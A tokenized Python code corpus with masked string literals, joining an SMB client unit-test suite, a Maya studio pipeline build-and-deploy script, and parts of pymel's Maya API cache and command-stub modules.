== self . machine ) <EOL> smb . logoff ( ) <EOL> def test_getDialect ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> dialect = smb . getDialect ( ) <EOL> self . assertTrue ( dialect == self . dialects ) <EOL> smb . logoff ( ) <EOL> def test_uploadDownload ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> f = open ( self . upload ) <EOL> smb . putFile ( self . share , self . file , f . read ) <EOL> f . close ( ) <EOL> f = open ( self . upload + '<STR_LIT:2>' , '<STR_LIT>' ) <EOL> smb . getFile ( self . share , self . file , f . write ) <EOL> f . close ( ) <EOL> os . unlink ( self . upload + '<STR_LIT:2>' ) <EOL> smb . deleteFile ( self . share , self . file ) <EOL> smb . logoff ( ) <EOL> def test_listShares ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . listShares ( ) <EOL> smb . logoff ( ) <EOL> def test_getSessionKey ( self ) : <EOL> smb = self . create_connection ( ) <EOL> smb . login ( self . username , self . password , self . domain ) <EOL> smb . getSessionKey ( ) <EOL> smb . logoff <EOL> class SMB1Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . flags2 = smb . SMB . FLAGS2_NT_STATUS | smb . SMB . FLAGS2_EXTENDED_SECURITY | smb . SMB . FLAGS2_LONG_NAMES <EOL> self . dialects = smb . SMB_DIALECT <EOL> class SMB1TestsUnicode ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . flags2 = smb . SMB . FLAGS2_UNICODE | smb . SMB . FLAGS2_NT_STATUS | smb . SMB . FLAGS2_EXTENDED_SECURITY | smb . SMB . FLAGS2_LONG_NAMES <EOL> self . dialects = smb . SMB_DIALECT <EOL> class SMB002Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . dialects = SMB2_DIALECT_002 <EOL> class SMB21Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . dialects = SMB2_DIALECT_21 <EOL> class SMB3Tests ( SMBTests ) : <EOL> def setUp ( self ) : <EOL> SMBTests . setUp ( self ) <EOL> configFile = ConfigParser . ConfigParser ( ) <EOL> configFile . read ( '<STR_LIT>' ) <EOL> self . username = configFile . get ( '<STR_LIT>' , '<STR_LIT:username>' ) <EOL> self . domain = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . serverName = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . password = configFile . get ( '<STR_LIT>' , '<STR_LIT:password>' ) <EOL> self . machine = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . hashes = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . aesKey = configFile . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . share = '<STR_LIT>' <EOL> self . file = '<STR_LIT>' <EOL> self . directory = '<STR_LIT>' <EOL> self . upload = '<STR_LIT>' <EOL> self . dialects = SMB2_DIALECT_30 <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB1Tests ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB1TestsUnicode ) ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB002Tests ) ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB21Tests ) ) <EOL> suite . addTests ( unittest . TestLoader ( ) . loadTestsFromTestCase ( SMB3Tests ) ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:1> ) . run ( suite ) </s>
<s> '''<STR_LIT>''' <EOL> from common . core import globalVariables as gv <EOL> import sys <EOL> if not gv . toolsLocation [ : <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> sys . exit ( ) <EOL> from common . diagnostic . pcsLogger import logger <EOL> from common . fileIO . pcsPath import Path <EOL> from common . perforce import pcsP4 <EOL> import compileall <EOL> import os <EOL> import shutil <EOL> import xml . etree . ElementTree as ET <EOL> _KEEP_NETWORK_PY = False <EOL> class PipelineBuild ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , remoteBuild = True ) : <EOL> """<STR_LIT>""" <EOL> '''<STR_LIT>''' <EOL> super ( PipelineBuild , self ) . __init__ ( ) <EOL> self . p4 = pcsP4 . P4Lib ( maya = <NUM_LIT:0> ) <EOL> self . networkLoc = gv . toolsLocation <EOL> self . remoteBuild = remoteBuild <EOL> self . buildDest = Path ( gv . toolsLocation ) . parent + '<STR_LIT>' <EOL> def buildPCSPipeline ( self , compileInstaller = False , pyc = True , removePY = True , removePYC = True ) : <EOL> '''<STR_LIT>''' <EOL> completeSuccess = True <EOL> if pyc : <EOL> if not self . createPYCfiles ( self . pipelineSourceLocation ) : <EOL> completeSuccess = False <EOL> if self . remoteBuild : <EOL> if not self . pushToNetwork ( self . buildDest , remote = True ) : <EOL> completeSuccess = False <EOL> if removePY : <EOL> if not _KEEP_NETWORK_PY : <EOL> if not self . removePYfiles ( pathToScrape = self . buildDest ) : <EOL> completeSuccess = False <EOL> for pyFile in Path ( self . buildDest ) . walkfiles ( '<STR_LIT>' ) : <EOL> if "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile : <EOL> pyFile . makeWritable ( ) <EOL> pcsStudioXML = Path ( '<STR_LIT>' % self . buildDest ) <EOL> if pcsStudioXML . exists ( ) : <EOL> pcsStudioXML . makeWritable ( _dir = False ) <EOL> self . clean ( self . buildDest ) <EOL> else : <EOL> if not self . pushToNetwork ( self . networkLoc , remote = False ) : <EOL> completeSuccess = False <EOL> if removePY : <EOL> if not _KEEP_NETWORK_PY : <EOL> if not self . removePYfiles ( pathToScrape = self . networkLoc ) : <EOL> completeSuccess = False <EOL> if removePYC : <EOL> if not self . removePYfiles ( pathToScrape = self . pipelineSourceLocation , optionalExt = '<STR_LIT>' ) : <EOL> completeSuccess = False <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return completeSuccess <EOL> def clean ( self , pNetworkLoc = '<STR_LIT>' ) : <EOL> _pNetworkLoc = pNetworkLoc <EOL> pymel102 = Path ( '<STR_LIT>' % _pNetworkLoc ) <EOL> if pymel102 . exists ( ) : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in pymel102 . dirs ( ) : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> pymel102 . rmtree ( ) <EOL> pymel103 = Path ( '<STR_LIT>' % _pNetworkLoc ) <EOL> for _dir in pymel103 . dirs ( ) : <EOL> if "<STR_LIT>" not in _dir . basename ( ) and "<STR_LIT>" not in _dir . basename ( ) : <EOL> print "<STR_LIT>" % _dir <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> for _file in pymel103 . files ( ) : <EOL> _file . makeWritable ( ) <EOL> _file . remove ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" % _pNetworkLoc ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def compileAPE ( self ) : <EOL> sys . path . append ( r'<STR_LIT>' ) <EOL> for p in sys . path : <EOL> logger . debug ( "<STR_LIT>" % p ) <EOL> self . p4 . fileName = '<STR_LIT>' % self . pipelineSourceLocation <EOL> self . p4 . p4CheckOut ( desc = "<STR_LIT>" ) <EOL> os . system ( r'<STR_LIT>' ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def createPYCfiles ( self , pathToScrape = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if not pathToScrape : <EOL> pathToScrape = self . pipelineSourceLocation <EOL> result = compileall . compile_dir ( pathToScrape , force = <NUM_LIT:1> ) <EOL> logger . debug ( "<STR_LIT>" % result ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return True <EOL> @ property <EOL> def pipelineSourceLocation ( self ) : <EOL> '''<STR_LIT>''' <EOL> globalPCSXMLPath = Path ( '<STR_LIT>' % self . networkLoc ) <EOL> globalPCSXML = ET . parse ( globalPCSXMLPath ) <EOL> globalXMLCore = globalPCSXML . getiterator ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> sourceLoc = globalXMLCore . get ( '<STR_LIT>' ) <EOL> return Path ( sourceLoc ) <EOL> def pushToNetwork ( self , networkLoc = gv . toolsLocation , remote = True ) : <EOL> '''<STR_LIT>''' <EOL> _pNetworkLoc = Path ( networkLoc ) <EOL> result = True <EOL> if remote : <EOL> for unused in range ( <NUM_LIT:4> ) : <EOL> if _pNetworkLoc . exists ( ) : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in _pNetworkLoc . dirs ( ) : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if '<STR_LIT>' in _dir : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> _pNetworkLoc . rmtree ( ) <EOL> print "<STR_LIT>" % ( self . pipelineSourceLocation , _pNetworkLoc ) <EOL> try : <EOL> Path ( self . pipelineSourceLocation ) . copytree ( _pNetworkLoc ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> raise <EOL> except shutil . Error as e : <EOL> print "<STR_LIT>" % e [ <NUM_LIT:0> ] <EOL> if not _pNetworkLoc . exists ( ) : <EOL> logger . error ( "<STR_LIT>" % _pNetworkLoc ) <EOL> for _dir in Path ( '<STR_LIT>' % _pNetworkLoc ) . dirs ( ) : <EOL> if _dir . namebase == '<STR_LIT>' : <EOL> Path ( _dir ) . move ( _pNetworkLoc ) <EOL> else : <EOL> if _pNetworkLoc . exists ( ) : <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in _pNetworkLoc . dirs ( ) : <EOL> if "<STR_LIT:data>" not in _dir : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> if '<STR_LIT>' in _dir : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> if _dir . exists ( ) : <EOL> try : <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _dir <EOL> except WindowsError : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> elif _dir == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> tempNetworkLoc = Path ( '<STR_LIT>' % _pNetworkLoc ) <EOL> print "<STR_LIT>" % ( self . pipelineSourceLocation , tempNetworkLoc ) <EOL> try : <EOL> Path ( self . pipelineSourceLocation ) . copytree ( tempNetworkLoc ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" % tempNetworkLoc <EOL> except shutil . Error as e : <EOL> print "<STR_LIT>" % e [ <NUM_LIT:0> ] <EOL> for _dir in tempNetworkLoc . dirs ( ) : <EOL> try : <EOL> if "<STR_LIT:data>" not in _dir : <EOL> Path ( _dir ) . move ( _pNetworkLoc ) <EOL> except WindowsError : <EOL> print "<STR_LIT>" + _dir <EOL> except shutil . Error : <EOL> print "<STR_LIT>" % _dir <EOL> raise <EOL> if tempNetworkLoc . exists ( ) : <EOL> print "<STR_LIT>" % tempNetworkLoc <EOL> for _file in tempNetworkLoc . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % tempNetworkLoc <EOL> tempNetworkLoc . rmtree ( ) <EOL> unNeededRoot = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for unNeeded in unNeededRoot : <EOL> print "<STR_LIT>" % ( _pNetworkLoc , unNeeded ) <EOL> for _dir in Path ( _pNetworkLoc ) . dirs ( ) : <EOL> if _dir . namebase == unNeeded : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in Path ( '<STR_LIT>' % _pNetworkLoc ) . dirs ( ) : <EOL> if _dir . namebase == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> pyMelDirs = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for pyMelDir in pyMelDirs : <EOL> if not Path ( '<STR_LIT>' % ( _pNetworkLoc , pyMelDir ) ) . exists ( ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> if not _dir . namebase == '<STR_LIT>' and not _dir . namebase == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> for _file in Path ( '<STR_LIT>' % ( _pNetworkLoc , pyMelDir ) ) . files ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _file <EOL> _file . remove ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> for _dir in Path ( '<STR_LIT>' % _pNetworkLoc ) . dirs ( ) : <EOL> if not _dir . namebase == '<STR_LIT>' : <EOL> for _file in _dir . walk ( ) : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _dir <EOL> _dir . rmtree ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> unNeededRoot = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for unNeeded in unNeededRoot : <EOL> for _file in _pNetworkLoc . files ( ) : <EOL> if _file . basename ( ) == unNeeded : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _file <EOL> _file . remove ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return result <EOL> def removePYfiles ( self , pathToScrape = '<STR_LIT>' , optionalExt = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> completeSuccess = True <EOL> logger . info ( "<STR_LIT>" % ( optionalExt , pathToScrape ) ) <EOL> if not pathToScrape : <EOL> pathToScrape = self . networkLoc <EOL> count = <NUM_LIT:0> <EOL> for pyFile in Path ( pathToScrape ) . walkfiles ( '<STR_LIT>' % optionalExt ) : <EOL> if "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile : <EOL> pyFile . makeWritable ( ) <EOL> continue <EOL> if not "<STR_LIT>" in pyFile : <EOL> if not "<STR_LIT>" in pyFile and not "<STR_LIT>" in pyFile : <EOL> try : <EOL> if Path ( pyFile ) . isReadOnly : <EOL> Path ( pyFile ) . makeWritable ( ) <EOL> os . remove ( pyFile ) <EOL> logger . debug ( "<STR_LIT>" % pyFile ) <EOL> count += <NUM_LIT:1> <EOL> except : <EOL> logger . info ( "<STR_LIT>" % pyFile ) <EOL> completeSuccess = False <EOL> print "<STR_LIT>" % ( count , optionalExt , pathToScrape ) <EOL> logger . info ( "<STR_LIT>" % ( count , optionalExt , pathToScrape ) ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % optionalExt <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" % optionalExt ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return completeSuccess <EOL> def swapGVarInit ( self , direction = '<STR_LIT>' ) : <EOL> gVarFile = '<STR_LIT>' % self . pipelineSourceLocation <EOL> self . p4 . fileName = gVarFile <EOL> self . p4 . p4CheckOut ( desc = "<STR_LIT>" ) <EOL> try : <EOL> f = open ( gVarFile , "<STR_LIT:r>" ) <EOL> gVarContent = f . readlines ( ) <EOL> f . close ( ) <EOL> newLines = [ ] <EOL> for line in gVarContent : <EOL> if "<STR_LIT>" in line : <EOL> if '<STR_LIT>' % direction in line : <EOL> newLines . append ( line . replace ( '<STR_LIT>' , '<STR_LIT:r>' ) ) <EOL> else : <EOL> newLines . append ( '<STR_LIT>' % line ) <EOL> else : <EOL> newLines . append ( line ) <EOL> f = open ( gVarFile , "<STR_LIT:w>" ) <EOL> f . writelines ( newLines ) <EOL> f . close ( ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" % gVarFile ) <EOL> print "<STR_LIT>" % gVarFile <EOL> self . p4 . p4RevertFile ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def run ( ) : <EOL> PipelineBuild ( remoteBuild = True ) . buildPCSPipeline ( compileInstaller = False , pyc = True , removePY = True , removePYC = True ) <EOL> run ( ) <EOL> if not __name__ == "<STR_LIT:__main__>" : <EOL> print "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import constraints <EOL> import customNodes <EOL> import expressions <EOL> def reloadAll ( ) : <EOL> """<STR_LIT>""" <EOL> reload ( constraints ) <EOL> reload ( customNodes ) <EOL> reload ( expressions ) <EOL> def exportRigs ( ) : <EOL> """<STR_LIT>""" <EOL> customNodes . exportNodes ( ) <EOL> constraints . exportConstraints ( ) <EOL> expressions . exportExpressions ( ) </s>
<s> import maya . cmds <EOL> import sys , os . path <EOL> commandListLocations = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def __makeStubFunc ( command , library ) : <EOL> def stubFunc ( * args , ** keywords ) : <EOL> """<STR_LIT>""" <EOL> maya . cmds . dynamicLoad ( library ) <EOL> return maya . cmds . __dict__ [ command ] ( * args , ** keywords ) <EOL> return stubFunc <EOL> def processCommandList ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> commandListPath = os . path . realpath ( os . environ [ '<STR_LIT>' ] ) <EOL> platform = maya . cmds . about ( os = True ) <EOL> commandListPath = os . path . join ( commandListPath , commandListLocations [ platform ] , '<STR_LIT>' ) <EOL> file = open ( commandListPath , '<STR_LIT:r>' ) <EOL> for line in file : <EOL> commandName , library = line . split ( ) <EOL> if not commandName in maya . cmds . __dict__ : <EOL> maya . cmds . __dict__ [ commandName ] = __makeStubFunc ( commandName , library ) <EOL> except : <EOL> sys . stderr . write ( "<STR_LIT>" % commandListPath ) <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> import sys , inspect , time , os . path <EOL> import pymel . api as api <EOL> import pymel . versions as versions <EOL> from pymel . util import expandArgs <EOL> import pymel . util as _util <EOL> import startup <EOL> import plogging as _plogging <EOL> _logger = _plogging . getLogger ( __name__ ) <EOL> class ApiEnum ( tuple ) : <EOL> def __str__ ( self ) : return '<STR_LIT:.>' . join ( [ str ( x ) for x in self ] ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , super ( ApiEnum , self ) . __repr__ ( ) ) <EOL> def pymelName ( self ) : <EOL> import pymel . internal . factories as factories <EOL> parts = list ( self ) <EOL> pymelName = factories . apiClassNameToPymelClassName ( self [ <NUM_LIT:0> ] ) <EOL> if pymelName is not None : <EOL> parts [ <NUM_LIT:0> ] = pymelName <EOL> return '<STR_LIT:.>' . join ( [ str ( x ) for x in parts ] ) <EOL> if versions . current ( ) < versions . v2012 : <EOL> api . Enum = ApiEnum <EOL> Enum = ApiEnum <EOL> def _makeDgModGhostObject ( mayaType , dagMod , dgMod ) : <EOL> if type ( dagMod ) is not api . MDagModifier or type ( dgMod ) is not api . MDGModifier : <EOL> raise ValueError , "<STR_LIT>" <EOL> parent = dagMod . createNode ( '<STR_LIT>' , api . MObject ( ) ) <EOL> try : <EOL> obj = dgMod . createNode ( mayaType ) <EOL> except RuntimeError : <EOL> try : <EOL> obj = dagMod . createNode ( mayaType , parent ) <EOL> except Exception , err : <EOL> _logger . debug ( "<STR_LIT>" % ( mayaType , err ) ) <EOL> return None <EOL> if api . isValidMObject ( obj ) : <EOL> return obj <EOL> else : <EOL> _logger . debug ( "<STR_LIT>" % mayaType ) <EOL> return None <EOL> def _defaultdictdict ( cls , val = None ) : <EOL> if val is None : <EOL> return _util . defaultdict ( dict ) <EOL> else : <EOL> return _util . defaultdict ( dict , val ) <EOL> class ApiMelBridgeCache ( startup . SubItemCache ) : <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> COMPRESSED = True <EOL> USE_VERSION = False <EOL> _CACHE_NAMES = '''<STR_LIT>''' . split ( ) <EOL> CACHE_TYPES = { '<STR_LIT>' : _defaultdictdict } <EOL> STORAGE_TYPES = { '<STR_LIT>' : dict } <EOL> class ApiCache ( startup . SubItemCache ) : <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> COMPRESSED = True <EOL> USE_VERSION = True <EOL> _CACHE_NAMES = '''<STR_LIT>''' . split ( ) <EOL> EXTRA_GLOBAL_NAMES = tuple ( '''<STR_LIT>''' . split ( ) ) <EOL> RESERVED_TYPES = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self ) : <EOL> super ( ApiCache , self ) . __init__ ( ) <EOL> for name in self . EXTRA_GLOBAL_NAMES : <EOL> setattr ( self , name , { } ) <EOL> def _buildMayaToApiInfo ( self , mayaTypes ) : <EOL> dagMod = api . MDagModifier ( ) <EOL> dgMod = api . MDGModifier ( ) <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> unknownTypes = set ( ) <EOL> for mayaType in mayaTypes : <EOL> apiType = None <EOL> if self . reservedMayaTypes . has_key ( mayaType ) : <EOL> apiType = self . reservedMayaTypes [ mayaType ] <EOL> else : <EOL> obj = _makeDgModGhostObject ( mayaType , dagMod , dgMod ) <EOL> if obj : <EOL> apiType = obj . apiTypeStr ( ) <EOL> else : <EOL> unknownTypes . add ( 